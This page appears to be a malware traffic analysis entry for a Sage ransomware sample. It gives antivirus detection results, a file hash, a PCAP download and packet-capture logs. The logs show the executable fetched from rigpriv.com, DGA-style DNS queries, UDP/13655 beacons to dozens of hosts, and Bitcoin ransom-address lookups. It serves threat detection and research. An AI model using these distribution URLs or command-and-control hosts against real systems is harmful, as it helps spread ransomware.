Sage Ransomware 2lm5xNQU.exe 211.114.4.45 UDP/13655 PCAP file download Malware Traffic Analysis

Download attachment

  • 1 pcap 21m5
    Date added: May 21, 2017 9:33 pm. Added by: admin. File size: 13 MB.
SHA256: 01fd9a6245c93f25ec2202d06bb40dbdcb5a3c1a0e5fb3db54c4d6253f9f7f4c
File name: 2lm5xNQU.exe
Detection ratio: 52 / 61
Analysis date: 2017-05-21 21:29:52 UTC
Ad-Aware Gen:Variant.Ransom.Sage.110 20170521
AegisLab Gen.Variant.Ransom!c 20170521
AhnLab-V3 Trojan/Win32.SageCrypt.R196517 20170521
ALYac Trojan.Ransom.Sage 20170520
Antiy-AVL Trojan/Win32.TSGeneric 20170521
Arcabit Trojan.Ransom.Sage.110 20170521
Avast Win32:Malware-gen 20170521
AVG Ransom_r.BRQ 20170521
Avira (no cloud) TR/Agent.bkkbc 20170521
AVware Trojan.Win32.Generic!BT 20170521
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170503
BitDefender Gen:Variant.Ransom.Sage.110 20170521

2017-05-21 15:59:43.097424 IP 192.168.1.102.55377 > 104.24.122.74.80: Flags [P.], seq 0:404, ack 1, win 256, length 404: HTTP: GET /upload/2lm5xNQU.exe HTTP/1.1
GET /upload/2lm5xNQU.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: rigpriv.com
Connection: Keep-Alive

2017-05-21 15:59:51.493214 IP 192.168.1.102.62487 > 75.75.75.75.53: 11787+ A? mbfce24rgn65bx3g.2kzm0f.com. (45)
2017-05-21 15:59:51.534744 IP 192.168.1.102.62488 > 75.75.75.75.53: 12566+ A? mbfce24rgn65bx3g.6t4u2p.net. (45)

2017-05-21 15:59:51.607060 IP 192.168.1.102.62489 > 211.114.4.45.13655: UDP, length 168
2017-05-21 15:59:51.607141 IP 192.168.1.102.62489 > 138.197.53.223.13655: UDP, length 168
2017-05-21 15:59:51.607195 IP 192.168.1.102.62489 > 211.114.186.119.13655: UDP, length 168
2017-05-21 15:59:51.607248 IP 192.168.1.102.62489 > 211.114.35.219.13655: UDP, length 168
2017-05-21 15:59:51.607300 IP 192.168.1.102.62489 > 211.114.128.4.13655: UDP, length 168
2017-05-21 15:59:51.607353 IP 192.168.1.102.62489 > 5.45.86.15.13655: UDP, length 168
2017-05-21 15:59:51.607403 IP 192.168.1.102.62489 > 5.45.111.91.13655: UDP, length 168
2017-05-21 15:59:51.607442 IP 192.168.1.102.62489 > 138.197.92.93.13655: UDP, length 168
2017-05-21 15:59:51.607503 IP 192.168.1.102.62489 > 5.45.173.171.13655: UDP, length 168
2017-05-21 15:59:51.607555 IP 192.168.1.102.62489 > 138.197.50.41.13655: UDP, length 168
2017-05-21 15:59:51.607606 IP 192.168.1.102.62489 > 5.45.27.108.13655: UDP, length 168
2017-05-21 15:59:51.607656 IP 192.168.1.102.62489 > 211.114.88.146.13655: UDP, length 168
2017-05-21 15:59:51.607707 IP 192.168.1.102.62489 > 138.197.249.221.13655: UDP, length 168
2017-05-21 15:59:51.607757 IP 192.168.1.102.62489 > 139.59.46.106.13655: UDP, length 168
2017-05-21 15:59:51.607809 IP 192.168.1.102.62489 > 5.45.199.75.13655: UDP, length 168
2017-05-21 15:59:51.607859 IP 192.168.1.102.62489 > 138.197.148.95.13655: UDP, length 168
2017-05-21 15:59:51.607934 IP 192.168.1.102.62489 > 138.197.69.39.13655: UDP, length 168
2017-05-21 15:59:51.607985 IP 192.168.1.102.62489 > 5.45.138.5.13655: UDP, length 168
2017-05-21 15:59:51.608035 IP 192.168.1.102.62489 > 138.197.243.44.13655: UDP, length 168
2017-05-21 15:59:51.608085 IP 192.168.1.102.62489 > 138.197.16.154.13655: UDP, length 168
2017-05-21 15:59:51.608136 IP 192.168.1.102.62489 > 5.45.17.36.13655: UDP, length 168
2017-05-21 15:59:51.608185 IP 192.168.1.102.62489 > 211.114.38.24.13655: UDP, length 168
2017-05-21 15:59:51.608237 IP 192.168.1.102.62489 > 139.59.63.179.13655: UDP, length 168
2017-05-21 15:59:51.608288 IP 192.168.1.102.62489 > 139.59.172.69.13655: UDP, length 168
2017-05-21 15:59:51.608338 IP 192.168.1.102.62489 > 5.45.2.69.13655: UDP, length 168
2017-05-21 15:59:51.608388 IP 192.168.1.102.62489 > 138.197.171.187.13655: UDP, length 168
2017-05-21 15:59:51.608438 IP 192.168.1.102.62489 > 5.45.168.29.13655: UDP, length 168
2017-05-21 15:59:51.608488 IP 192.168.1.102.62489 > 138.197.9.146.13655: UDP, length 168
2017-05-21 15:59:51.608538 IP 192.168.1.102.62489 > 5.45.62.33.13655: UDP, length 168
2017-05-21 15:59:51.608588 IP 192.168.1.102.62489 > 5.45.151.81.13655: UDP, length 168
2017-05-21 15:59:51.608638 IP 192.168.1.102.62489 > 139.59.228.94.13655: UDP, length 168
2017-05-21 15:59:51.608689 IP 192.168.1.102.62489 > 138.197.149.178.13655: UDP, length 168
2017-05-21 15:59:51.608746 IP 192.168.1.102.62489 > 5.45.154.15.13655: UDP, length 168
2017-05-21 15:59:51.608805 IP 192.168.1.102.62489 > 211.114.131.201.13655: UDP, length 168
2017-05-21 15:59:51.608855 IP 192.168.1.102.62489 > 138.197.96.60.13655: UDP, length 168
2017-05-21 15:59:51.608905 IP 192.168.1.102.62489 > 5.45.33.223.13655: UDP, length 168
2017-05-21 15:59:51.608958 IP 192.168.1.102.62489 > 139.59.54.221.13655: UDP, length 168
2017-05-21 15:59:51.609008 IP 192.168.1.102.62489 > 139.59.207.207.13655: UDP, length 168
2017-05-21 15:59:51.609058 IP 192.168.1.102.62489 > 5.45.60.130.13655: UDP, length 168
2017-05-21 15:59:51.609111 IP 192.168.1.102.62489 > 139.59.13.3.13655: UDP, length 168
2017-05-21 15:59:51.609161 IP 192.168.1.102.62489 > 5.45.18.85.13655: UDP, length 168
2017-05-21 15:59:51.609211 IP 192.168.1.102.62489 > 138.197.123.231.13655: UDP, length 168
2017-05-21 15:59:51.609261 IP 192.168.1.102.62489 > 211.114.56.29.13655: UDP, length 168
2017-05-21 15:59:51.609311 IP 192.168.1.102.62489 > 211.114.89.107.13655: UDP, length 168
2017-05-21 15:59:51.609313 IP 192.168.1.102.62489 > 139.59.14.44.13655: UDP, length 168
2017-05-21 15:59:51.609412 IP 192.168.1.102.62489 > 139.59.39.156.13655: UDP, length 168
2017-05-21 15:59:51.609461 IP 192.168.1.102.62489 > 211.114.116.17.13655: UDP, length 168
2017-05-21 15:59:51.609511 IP 192.168.1.102.62489 > 211.114.165.130.13655: UDP, length 168
2017-05-21 15:59:51.609561 IP 192.168.1.102.62489 > 138.197.106.102.13655: UDP, length 168

2017-05-21 16:02:08.958333 IP 192.168.1.102.57831 > 75.75.75.75.53: 3648+ A? 7gie6ffnkrjykggd.2kzm0f.com. (45)
2017-05-21 16:02:16.440909 IP 192.168.1.102.57832 > 75.75.75.75.53: 19803+ A? 7gie6ffnkrjykggd.6t4u2p.net. (45)
2017-05-21 16:02:16.443659 IP 192.168.1.102.57833 > 75.75.75.75.53: 15121+ A? 7gie6ffnkrjykggd.6t4u2p.net. (45)
2017-05-21 16:02:22.417162 IP 192.168.1.102.57834 > 75.75.75.75.53: 31003+ A? btc.blockr.io. (31)
2017-05-21 16:02:54.976371 IP 192.168.1.102.57835 > 75.75.75.75.53: 35937+ A? 7gie6ffnkrjykggd.xcvkjet.net. (46)
2017-05-21 16:02:59.001852 IP 192.168.1.102.57836 > 75.75.75.75.53: 17942+ A? 7gie6ffnkrjykggd.onion. (40)

2017-05-21 16:02:22.575024 IP 192.168.1.102.55449 > 104.16.150.172.80: Flags [P.], seq 3986130788:3986131109, ack 3679392996, win 256, length 321: HTTP: GET /api/v1/address/txs/1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7?_=1495396820544 HTTP/1.1
GET /api/v1/address/txs/1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7?_=1495396820544 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: btc.blockr.io
Connection: Keep-Alive

2017-05-21 16:02:26.753866 IP 192.168.1.102.55449 > 104.16.150.172.80: Flags [P.], seq 321:730, ack 994, win 252, length 409: HTTP: GET /api/v1/tx/info/04a47ecab9ebfe44f3a35a5e8e6db53fa8b384569164887253d848e30eb43338?_=1495396824927 HTTP/1.1
GET /api/v1/tx/info/04a47ecab9ebfe44f3a35a5e8e6db53fa8b384569164887253d848e30eb43338?_=1495396824927 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: btc.blockr.io
Connection: Keep-Alive
Cookie: __cfduid=dd4bbc41b4b92668e8a831a116dc12fb51495396823

2017-05-21 16:02:52.524435 IP 192.168.1.102.55449 > 104.16.150.172.80: Flags [P.], seq 730:1113, ack 1978, win 256, length 383: HTTP: GET /api/v1/address/txs/1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7?_=1495396850683 HTTP/1.1
GET /api/v1/address/txs/1783wBGsr1zkxenfEELXA25PLSkLdfJ4B7?_=1495396850683 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: btc.blockr.io
Connection: Keep-Alive
Cookie: __cfduid=dd4bbc41b4b92668e8a831a116dc12fb51495396823

2017-05-21 16:02:54.064172 IP 192.168.1.102.55449 > 104.16.150.172.80: Flags [P.], seq 1113:1522, ack 2831, win 253, length 409: HTTP: GET /api/v1/tx/info/04a47ecab9ebfe44f3a35a5e8e6db53fa8b384569164887253d848e30eb43338?_=1495396852243 HTTP/1.1
GET /api/v1/tx/info/04a47ecab9ebfe44f3a35a5e8e6db53fa8b384569164887253d848e30eb43338?_=1495396852243 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: btc.blockr.io
Connection: Keep-Alive
Cookie: __cfduid=dd4bbc41b4b92668e8a831a116dc12fb51495396823
